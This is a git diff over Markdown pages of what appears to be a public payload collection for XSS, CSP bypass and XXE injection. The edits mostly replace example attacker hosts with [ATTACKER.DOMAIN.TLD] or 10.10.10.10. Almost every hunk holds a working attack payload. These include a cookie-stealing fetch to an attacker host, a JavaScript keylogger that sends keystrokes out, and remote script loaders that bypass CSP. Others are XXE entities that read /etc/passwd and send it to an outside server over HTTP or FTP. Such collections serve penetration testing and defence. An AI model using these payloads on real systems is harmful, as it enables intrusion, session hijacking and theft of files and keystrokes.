--- a/XSS Injection/4 - CSP Bypass.md	
+++ b/XSS Injection/4 - CSP Bypass.md	
@@ -50,11 +50,11 @@ Use a callback function from a whitelisted source listed in the CSP.
 
 **Payload**:
 
-`http://example.lab/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//remoteattacker.lab/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;`
+`http://example.lab/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//[ATTACKER.DOMAIN.TLD]/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;`
 
 ```js
 script=document.createElement('script');
-script.src='//remoteattacker.lab/csp.js';
+script.src='//[ATTACKER.DOMAIN.TLD]/csp.js';
 window.frames[0].document.head.appendChild(script);
 ```
 
@@ -69,7 +69,7 @@ Source: [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-yo
 **Payload**:
 
 ```js
-d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
+d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[ATTACKER.DOMAIN.TLD]";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
 ```
 
 Source: [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f)
@@ -126,13 +126,13 @@ Source: [@404death](https://twitter.com/404death/status/1191222237782659072)
 - Inject a base tag.
 
   ```html
-  <base href=http://www.attacker.com>
+  <base href=http://[ATTACKER.DOMAIN.TLD]>
   ```
 
 - Host your custom js file at the same path that one of the website's script.
 
   ```ps1
-  http://www.attacker.com/PATH.js
+  http://[ATTACKER.DOMAIN.TLD]/PATH.js
   ```
 
 ## Bypass CSP header sent by PHP
diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 94fb730..84f216e 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -84,7 +84,7 @@ fclose($fp);
 
 ```html
 <script>
-  fetch('https://<SESSION>.burpcollaborator.net', {
+  fetch('https://[ATTACKER.DOMAIN.TLD]', {
   method: 'POST',
   mode: 'no-cors',
   body: document.cookie
@@ -108,7 +108,7 @@ document.body.innerHTML = "</br></br></br></br></br><h1>Please login to continue
 Another way to collect sensitive data is to set a javascript keylogger.
 
 ```javascript
-<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>
+<img src=x onerror='document.onkeypress=function(e){fetch("http://[ATTACKER.DOMAIN.TLD]/?k="+String.fromCharCode(e.which))},this.remove();'>
 ```
 
 ### Other Ways
@@ -152,7 +152,7 @@ Example:
 <script>console.log("Test XSS from the search bar of page XYZ\n".concat(document.domain).concat("\n").concat(window.origin))</script>
 ```
 
-References:
+Additional reading:
 
 - [Google Bughunter University - XSS in sandbox domains](https://sites.google.com/site/bughunteruniversity/nonvuln/xss-in-sandbox-domain)
 - [LiveOverflow Video - DO NOT USE alert(1) for XSS](https://www.youtube.com/watch?v=KHwVjzWei1c)
@@ -401,7 +401,7 @@ SVG 1.x (xlink:href)
 
 ```xml
 <svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
-  <image xlink:href="http://127.0.0.1:9999/red_lightning_xss_full.svg" height="200" width="200"/>
+  <image xlink:href="http://10.10.10.10:9999/red_lightning_xss_full.svg" height="200" width="200"/>
 </svg>
 ```
 
@@ -411,7 +411,7 @@ SVG 1.x (xlink:href)
 
 ```xml
 <svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
-  <use xlink:href="http://127.0.0.1:9999/red_lightning_xss_full.svg#lightning"/>
+  <use xlink:href="http://10.10.10.10:9999/red_lightning_xss_full.svg#lightning"/>
 </svg>
 ```
 
@@ -470,7 +470,7 @@ div  {
 
 <script>
 document.getElementById('btn').onclick = function(e){
-    window.poc = window.open('http://www.redacted.com/#login');
+    window.poc = window.open('http://10.10.10.10/#login');
     setTimeout(function(){
         window.poc.postMessage(
             {
@@ -499,9 +499,9 @@ You can set up an alternative version
 - Hosted on [xsshunter.trufflesecurity.com](https://xsshunter.trufflesecurity.com/)
 
 ```xml
-"><script src="https://js.rip/<custom.name>"></script>
-"><script src=//<custom.subdomain>.xss.ht></script>
-<script>$.getScript("//<custom.subdomain>.xss.ht")</script>
+"><script src="https://js.rip/[ATTACKER.DOMAIN.TLD]"></script>
+"><script src=//[ATTACKER.DOMAIN.TLD]></script>
+<script>$.getScript("//[ATTACKER.DOMAIN.TLD]")</script>
 ```
 
 ### Other Blind XSS tools
@@ -530,7 +530,7 @@ You can use a [data grabber for XSS](#data-grabber) and a one-line HTTP server t
 Eg. payload
 
 ```html
-<script>document.location='http://10.10.14.30:8080/XSS/grabber.php?c='+document.domain</script>
+<script>document.location='http://[ATTACKER.DOMAIN.TLD]/XSS/grabber.php?c='+document.domain</script>
 ```
 
 Eg. one-line HTTP server:
diff --git a/XXE Injection/README.md b/XXE Injection/README.md
index 4598997..b4870b2 100644
--- a/XXE Injection/README.md	
+++ b/XXE Injection/README.md	
@@ -302,7 +302,7 @@ Payloads from [infosec-au/xxe-windows.md](https://gist.github.com/infosec-au/2c6
 ```xml
 <?xml version="1.0" ?>
 <!DOCTYPE message [
-    <!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd">
+    <!ENTITY % ext SYSTEM "http://[ATTACKER.DOMAIN.TLD]/ext.dtd">
     %ext;
 ]>
 <message></message>
@@ -343,29 +343,29 @@ Sometimes you won't have a result outputted in the page but you can still extrac
 
 ### Basic Blind XXE
 
-The easiest way to test for a blind XXE is to try to load a remote resource such as a Burp Collaborator.
+The easiest way to test for a blind XXE is to try to load a remote resource such as a callback endpoint controlled by the tester.
 
 ```xml
 <?xml version="1.0" ?>
 <!DOCTYPE root [
-<!ENTITY % ext SYSTEM "http://UNIQUE_ID_FOR_BURP_COLLABORATOR.burpcollaborator.net/x"> %ext;
+<!ENTITY % ext SYSTEM "http://[ATTACKER.DOMAIN.TLD]/x"> %ext;
 ]>
 <r></r>
 ```
 
 ```xml
-<!DOCTYPE root [<!ENTITY test SYSTEM 'http://UNIQUE_ID_FOR_BURP_COLLABORATOR.burpcollaborator.net'>]>
+<!DOCTYPE root [<!ENTITY test SYSTEM 'http://[ATTACKER.DOMAIN.TLD]'>]>
 <root>&test;</root>
 ```
 
-Send the content of `/etc/passwd` to "www.malicious.com", you may receive only the first line.
+Send the content of `/etc/passwd` to `http://[ATTACKER.DOMAIN.TLD]`, you may receive only the first line.
 
 ```xml
 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [
 <!ELEMENT foo ANY >
 <!ENTITY % xxe SYSTEM "file:///etc/passwd" >
-<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">
+<!ENTITY callhome SYSTEM "http://[ATTACKER.DOMAIN.TLD]/?%xxe;">
 ]
 >
 <foo>&callhome;</foo>
@@ -377,12 +377,12 @@ Send the content of `/etc/passwd` to "www.malicious.com", you may receive only t
 
 ```xml
 <?xml version="1.0" encoding="utf-8"?>
-<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
+<!DOCTYPE data SYSTEM "http://[ATTACKER.DOMAIN.TLD]/parameterEntity_oob.dtd">
 <data>&send;</data>
 
-File stored on http://publicServer.com/parameterEntity_oob.dtd
+File stored on http://[ATTACKER.DOMAIN.TLD]/parameterEntity_oob.dtd
 <!ENTITY % file SYSTEM "file:///sys/power/image_size">
-<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://[ATTACKER.DOMAIN.TLD]/?%file;'>">
 %all;
 ```
 
@@ -392,15 +392,15 @@ File stored on http://publicServer.com/parameterEntity_oob.dtd
 <?xml version="1.0" ?>
 <!DOCTYPE r [
 <!ELEMENT r ANY >
-<!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml">
+<!ENTITY % sp SYSTEM "http://10.10.10.10/dtd.xml">
 %sp;
 %param1;
 ]>
 <r>&exfil;</r>
 
-File stored on http://127.0.0.1/dtd.xml
+File stored on http://10.10.10.10/dtd.xml
 <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
-<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
+<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.10.10/dtd.xml?%data;'>">
 ```
 
 ### XXE OOB with Apache Karaf
@@ -412,7 +412,7 @@ CVE-2018-11788 affecting versions:
 
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://27av6zyg33g8q8xu338uvhnsc.canarytokens.com"> %dtd;]
+<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://[ATTACKER.DOMAIN.TLD]"> %dtd;]
 <features name="my-features" xmlns="http://karaf.apache.org/xmlns/features/v1.3.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://karaf.apache.org/xmlns/features/v1.3.0 http://karaf.apache.org/xmlns/features/v1.3.0">
     <feature name="deployer" version="2.0" install="auto">
@@ -500,7 +500,7 @@ _xxe.svg_:
 <?xml version="1.0" standalone="yes"?>
 <!DOCTYPE svg [
 <!ELEMENT svg ANY >
-<!ENTITY % sp SYSTEM "http://example.org:8080/xxe.xml">
+<!ENTITY % sp SYSTEM "http://10.10.10.10:8080/xxe.xml">
 %sp;
 %param1;
 ]>
@@ -522,7 +522,7 @@ _xxe.xml_:
 
 ```xml
 <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/hostname">
-<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://example.org:2121/%data;'>">
+<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://10.10.10.10:2121/%data;'>">
 ```
 
 ### XXE Inside SOAP
@@ -530,7 +530,7 @@ _xxe.xml_:
 ```xml
 <soap:Body>
   <foo>
-    <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]>
+  <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://10.10.10.10:22/"> %dtd;]><xxx/>]]>
   </foo>
 </soap:Body>
 ```
@@ -597,7 +597,7 @@ Add your blind XXE payload inside `xl/workbook.xml`.
 
 ```xml
 <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<!DOCTYPE cdl [<!ELEMENT cdl ANY ><!ENTITY % asd SYSTEM "http://x.x.x.x:8000/xxe.dtd">%asd;%c;]>
+<!DOCTYPE cdl [<!ELEMENT cdl ANY ><!ENTITY % asd SYSTEM "http://10.10.10.10:8000/xxe.dtd">%asd;%c;]>
 <cdl>&rrr;</cdl>
 <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
 ```
@@ -606,7 +606,7 @@ Alternatively, add your payload in `xl/sharedStrings.xml`:
 
 ```xml
 <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<!DOCTYPE cdl [<!ELEMENT t ANY ><!ENTITY % asd SYSTEM "http://x.x.x.x:8000/xxe.dtd">%asd;%c;]>
+<!DOCTYPE cdl [<!ELEMENT t ANY ><!ENTITY % asd SYSTEM "http://10.10.10.10:8000/xxe.dtd">%asd;%c;]>
 <sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10" uniqueCount="10"><si><t>&rrr;</t></si><si><t>testA2</t></si><si><t>testA3</t></si><si><t>testA4</t></si><si><t>testA5</t></si><si><t>testB1</t></si><si><t>testB2</t></si><si><t>testB3</t></si><si><t>testB4</t></si><si><t>testB5</t></si></sst>
 ```
 
@@ -618,7 +618,7 @@ And using FTP instead of HTTP allows to retrieve much larger files.
 
 ```xml
 <!ENTITY % d SYSTEM "file:///etc/passwd">
-<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">
+<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://10.10.10.10:2121/%d;'>">
 ```
 
 Serve DTD and receive FTP payload using [staaldraad/xxeserv](https://github.com/staaldraad/xxeserv):
@@ -637,7 +637,7 @@ When all you control is the DTD file, and you do not control the `xml` file, XXE
 <!-- Load the contents of a sensitive file into a variable -->
 <!ENTITY % payload SYSTEM "file:///etc/passwd">
 <!-- Use that variable to construct an HTTP get request with the file contents in the URL -->
-<!ENTITY % param1 '<!ENTITY &#37; external SYSTEM "http://my.evil-host.com/x=%payload;">'>
+<!ENTITY % param1 '<!ENTITY &#37; external SYSTEM "http://[ATTACKER.DOMAIN.TLD]/x=%payload;">'>
 %param1;
 %external;
 ```